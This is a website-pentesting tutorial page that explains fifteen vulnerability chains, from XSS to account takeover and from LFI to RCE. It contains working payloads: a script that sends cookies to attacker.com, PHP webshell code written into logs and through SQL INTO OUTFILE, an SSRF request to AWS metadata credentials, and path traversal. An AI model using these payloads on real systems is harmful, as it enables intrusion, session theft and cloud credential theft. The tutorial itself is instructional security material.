Home > Website Pentesting

Chaining Vulnerabilities

Chaining vulnerabilities means combining multiple independent flaws into a single attack path that achieves a much higher impact than any vulnerability alone. Most real-world compromises succeed not because of one “big” bug, but because an attacker links small, moderate, or partial vulnerabilities into a full exploitation chain.
A vulnerability that seems harmless in isolation becomes critical when connected to another weakness.

Chaining relies on understanding how different components interact: authentication, sessions, APIs, file systems, templates, redirects, WebSockets, and business logic. The attacker strategically uses one flaw to reach the next.

Why Vulnerability Chains Work

Individual weaknesses often have limitations:

  • SQLi may require authentication

  • XSS might be self-only

  • SSRF might reach internal endpoints but not escalate

  • LFI may not lead to RCE immediately

  • IDOR may reveal limited data

  • Race conditions may break logic but not give access

Chaining solves these limitations by linking one flaw to elevate another.

Core Principles of Exploit Chains

An effective chain requires:

  • identifying interaction points

  • understanding trust boundaries

  • recognizing how one flaw unlocks another

  • combining lower-severity bugs to escalate

  • looking for state transitions

  • evaluating flawed assumptions in application logic

Attackers focus on how flaws connect, not just how they work separately.

Common Vulnerability Chain Types

Below are the major real-world, fully practical chaining techniques.

Chain 1: XSS → Session Hijacking → Account Takeover

Step 1: Inject XSS payload

<script>fetch('https://attacker.com?c='+document.cookie)</script>

Step 2: Receive victim’s session cookie
Step 3: Use session cookie to log in as victim
Step 4: Access personal data, payment info, or admin features

If HttpOnly is missing, this chain is trivial.
Even with HttpOnly, XSS can still perform privileged actions.

Chain 2: LFI → Log Poisoning → RCE

Step 1: Poison log with PHP code through User-Agent

User-Agent: <?php system($_GET['cmd']); ?>

Step 2: Use LFI to load the log file

/var/log/apache2/access.log

Step 3: Execute arbitrary commands

?cmd=id

This turns a weak LFI into full RCE.

Chain 3: SSRF → AWS Metadata → Access Keys → Cloud Takeover

Step 1: Trigger SSRF hitting metadata service

http://169.254.169.254/latest/meta-data/iam/security-credentials/role

Step 2: Steal access keys
Step 3: Use stolen keys to:

  • list S3 buckets

  • download sensitive assets

  • deploy EC2 instances

  • modify IAM policies

SSRF alone is moderate severity; chained with metadata access becomes catastrophic.

Chain 4: IDOR → Password Reset Token Leak → Account Takeover

Step 1: IDOR reveals reset tokens

/reset-tokens?user=3

Step 2: Extract token
Step 3: Submit reset request

POST /reset
token=exposedToken&newPass=123

Chain turns an IDOR into full account compromise.

Chain 5: XSS → CSRF Bypass → Privilege Escalation

If CSRF tokens are stored in DOM or reflected in JS, XSS can extract them.

Step 1: Execute XSS
Step 2: Extract CSRF token
Step 3: Send privileged request

POST /makeAdmin

Even strong CSRF protection collapses under XSS.

Chain 6: SQLi → File Write → Webshell → RCE

Step 1: SQLi enables writing arbitrary files

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Step 2: Access webshell

/shell.php?cmd=id

Step 3: Full remote code execution

Chain 7: Race Condition → Balance Manipulation → Transfer Abuse

Step 1: Race condition duplicates wallet credits
Step 2: Attacker inflates balance
Step 3: Use inflated balance to:

  • purchase items

  • transfer to attacker account

  • redeem coupons

Minor flaw becomes financial breach.

Chain 8: WebSocket Auth Bypass → Admin Actions

Step 1: WebSocket accepts handshake without validating session
Step 2: Attacker joins admin WebSocket channel
Step 3: Send privileged actions

{"action":"deleteUser","id":1}

Lack of WebSocket auth combined with internal features leads to privilege escalation.

Chain 9: Open Redirect → OAuth Token Theft → Account Takeover

Step 1: Redirect parameter:

/redirect?url=https://attacker.com

Step 2: OAuth callback vulnerable:

redirect_uri=trusted.com/redirect?url=

Step 3: Attacker gets OAuth code
Step 4: Exchange for access token
Step 5: Login as victim

Chain 10: Deserialization → Arbitrary Object → RCE

Step 1: Find user-controlled unserialize() or pickle/Java deserialization
Step 2: Use gadget chain
Step 3: Execute arbitrary commands or load malicious classes
Step 4: Escalate to full server compromise

Chain 11: Weak Password Policy → Credential Stuffing → Insecure Session → Admin Panel Access

Step 1: Attackers try breached password lists
Step 2: Weak password accepted
Step 3: Session tokens are predictable or reused
Step 4: Admin access achieved

Weak configurations combine to form critical breach.

Chain 12: CORS Misconfiguration → API Token Leak → Privilege Abuse

Step 1: CORS allows * or attacker domain
Step 2: Browser sends session cookies via withCredentials=true
Step 3: Attacker JS reads API responses
Step 4: Extract tokens and act as victim

CORS alone is not “critical,” but when chained with authenticated APIs, it becomes severe.

Chain 13: API Mass Assignment → Privilege Escalation → IDOR → Full User Data Access

Step 1: Mass assignment sets admin role

{"role":"admin"}

Step 2: Access admin-only endpoints
Step 3: Exploit IDOR to access user records

Chain 14: Path Traversal → Source Code Read → Secret Keys Leak → JWT Forgery

Step 1: Read config file:

../../../../config.js

Step 2: Extract JWT secret
Step 3: Forge new JWT:

{"role":"admin"}

Step 4: Login as admin

Chain 15: Weak Rate Limit → OTP Brute Force → Account Takeover

Step 1: OTP endpoint lacks rate-limiting
Step 2: Brute-force:

000000 → 999999

Step 3: Login as victim
Step 4: Change password

Alone, rate-limit bypass is medium; chained it's critical.

Practical Strategy for Identifying Chains

Step 1: Map all discovered vulnerabilities

Document each flaw.

Step 2: Identify connecting points

Look for:

  • shared parameters

  • tokens

  • session flows

  • API interactions

  • database dependencies

  • trust boundaries

Step 3: Check for escalations

Use a small flaw to break a bigger mechanism.

Step 4: Attempt multi-step attacks

Simulate how one weakness influences the next.

Step 5: Combine access + misconfigurations

This yields highest impact chains.

Advanced Chaining Techniques

Lateral Movement Chaining

  • SSRF → internal admin panel

  • admin panel → unsafe file upload

  • file upload → webshell

  • webshell → root access

Multi-Parser Chaining

Exploit differences in:

  • WAF

  • backend

  • framework

  • proxy

Multi-Context Payload Chaining

Payload encoded once → decoded twice → executed.

Real-World Exploit Chain Patterns

  • Authentication bypass → Privilege escalation → Data extraction

  • Open redirect → OAuth code leakage → Session takeover

  • Blind SQLi → File read → Key extraction → RCE

  • XSS → Cookie grab → CSRF token steal → Account takeover

  • Race condition → Financial manipulation → Balance transfer abuse

  • SSRF → Redis access → Write cron job → RCE

Intel Dump

  • Vulnerability chaining turns minor flaws into high-impact attacks.

  • Chains combine authentication flaws, injections, logic bugs, misconfigurations, and transport-layer weaknesses.

  • Key chains include XSS → session theft, LFI → log poisoning, SSRF → metadata access, IDOR → token leak, SQLi → file write, and many others.

  • Chains exploit assumptions across components, taking advantage of how one flaw unlocks another.

  • Real-world exploitation rarely uses one vulnerability; chaining multiplies impact into full system compromise.

HOME LEARN COMMUNITY DASHBOARD